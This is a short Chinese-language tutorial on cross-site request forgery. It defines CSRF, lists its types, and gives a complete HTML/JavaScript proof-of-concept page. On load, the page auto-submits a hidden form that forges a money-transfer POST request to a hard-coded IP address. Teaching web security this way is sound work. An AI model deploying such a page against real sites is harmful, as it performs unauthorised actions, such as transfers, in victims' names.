CSRF


跨站请求伪造(CSRF)

CSRF,全名 Cross Site Request Forgery,跨站请求伪造。很容易将它与 XSS 混淆,对于 CSRF,其两个关键点是跨站点的请求与请求的伪造,由于目标站无 token 或 referer 防御,导致用户的敏感操作的每一个参数都可以被攻击者获知,攻击者即可以伪造一个完全一样的请求以用户的身份达到恶意目的。

按请求类型,可分为 GET 型和 POST 型。

按攻击方式,可分为 HTML CSRF、JSON HiJacking、Flash CSRF 等。

  • HTML CSRF

    使用表单来对 POST 型的请求进行伪造:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    <!--click.html-->

    <html>
    <body>
    <h1>
    This page forges an HTTP POST request.
    </h1>
    <script type="text/javascript">
    function post(url, fields) {
    //create a <form> element.
    var p = document.createElement("form");
    //construct the form
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    //append the form to the current page.
    document.body.appendChild(p);
    //submit the form
    p.submit();
    }

    function csrf_hack() {
    var fields;
    // The following are form entries that need to be filled out
    // by attackers. The entries are made hidden, so the victim
    // won't be able to see them.
    fields += "<input type='hidden' name='target' value='aaaaaa'>";
    fields += "<input type='hidden' name='money' value='10000'>";
    fields += "<input type='hidden' name='messages' value='test'>";
    post('http://173.82.206.142:8005/transfer.php', fields);
    }
    // invoke csrf_hack() after the page is loaded.
    window.onload = function() {
    csrf_hack();
    }
    </script>
    </body>
    </html>